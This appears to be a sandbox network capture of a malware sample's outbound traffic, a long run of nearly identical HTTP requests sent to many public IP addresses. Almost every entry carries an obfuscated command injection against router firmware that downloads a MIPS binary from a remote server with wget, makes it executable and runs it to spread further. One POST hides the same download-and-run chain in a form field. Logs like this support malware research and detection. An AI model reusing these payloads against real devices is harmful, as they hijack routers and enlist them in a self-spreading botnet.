                                                Jan 12, 2024 18:16:16.290019035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2881192.168.2.234579034.101.240.183443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.290046930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2882192.168.2.2341492165.85.251.174443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.290082932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2883192.168.2.233691873.82.6.109443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.290132999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2884192.168.2.234223099.234.47.258080
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.135134935 CET240OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                Cookie: user=admin
                                                Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 38 38 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.188/skyljne.mpsl; chmod 777 skyljne.mpsl; ./skyljne.mpsl lblink.selfrep;rm *mpsl*;
                                                Jan 12, 2024 18:16:17.271667004 CET528INHTTP/1.1 400 Bad Request
                                                Content-Type: text/html
                                                Content-Length: 345
                                                Connection: close
                                                Date: Sun, 25 Jan 1970 22:12:58 GMT
                                                Server: Xfinity Broadband Router Server
                                                Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>400 Bad Request</title> </head> <body> <h1>400 Bad Request</h1> </body></html>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2885192.168.2.234960248.114.24.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.299190998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2886192.168.2.2350690141.50.174.64443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.299247026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2887192.168.2.2344088216.19.33.25443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.299279928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2888192.168.2.234830623.160.218.21443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.299339056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2889192.168.2.2354364122.145.133.215443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.299387932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2890192.168.2.235635266.63.240.127443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.299418926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2891192.168.2.2349612109.203.197.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.299467087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2892192.168.2.2343626112.52.12.124443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.299503088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2893192.168.2.2335052223.191.55.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.299537897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2894192.168.2.234388027.3.81.241443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.299590111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2895192.168.2.2346376206.184.252.176443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.299626112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2896192.168.2.233700484.97.227.102443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.299679041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2897192.168.2.2357096221.162.161.149443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.299716949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2898192.168.2.235664836.119.212.74443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.299771070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2899192.168.2.234810249.62.87.117443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.299801111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2900192.168.2.2349972187.134.200.18443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.299859047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2901192.168.2.2335252200.145.132.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.299890041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2902192.168.2.233381657.222.154.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.299926043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2903192.168.2.235186692.197.178.144443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.299957037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2904192.168.2.235205891.117.149.64443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.299994946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2905192.168.2.233333851.135.11.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.300036907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2906192.168.2.234607491.155.149.131443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.300082922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2907192.168.2.2358908162.207.111.63443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.300115108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2908192.168.2.235200891.249.27.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.300157070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2909192.168.2.2357048136.130.50.216443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.300194025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2910192.168.2.2353776209.57.64.165443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.300230980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2911192.168.2.2352622191.68.126.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.300271034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2912192.168.2.2353168197.152.78.236443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.300303936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2913192.168.2.2353370200.168.62.151443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.300348043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2914192.168.2.2335112216.177.140.227443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.300369024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2915192.168.2.233484090.196.213.121443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.300419092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2916192.168.2.2341138144.29.194.140443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.300450087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2917192.168.2.2357074199.13.54.99443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.300497055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2918192.168.2.2347776193.125.85.106443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.300543070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2919192.168.2.234581253.97.174.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.300589085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2920192.168.2.2339282195.118.12.127443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.300620079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2921192.168.2.233419266.147.182.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.300666094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2922192.168.2.23328489.118.204.74443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.300713062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2923192.168.2.233743075.154.72.179443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.300764084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2924192.168.2.234884441.184.98.13443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.300801039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2925192.168.2.2358826107.40.2.151443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.300863028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2926192.168.2.234729631.128.189.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.300892115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2927192.168.2.2341662176.217.176.223443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.300941944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2928192.168.2.2339568156.70.140.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.300975084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2929192.168.2.2351204155.163.149.104443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.301004887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2930192.168.2.234982082.255.250.235443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.301026106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2931192.168.2.2349774156.72.227.115443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.301044941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2932192.168.2.2356024199.178.226.65443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.301098108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2933192.168.2.2350350111.33.190.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.301141024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2934192.168.2.2359024150.50.48.188443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.301172018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2935192.168.2.2339040140.176.214.47443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.301215887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2936192.168.2.2359290129.223.49.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.301256895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


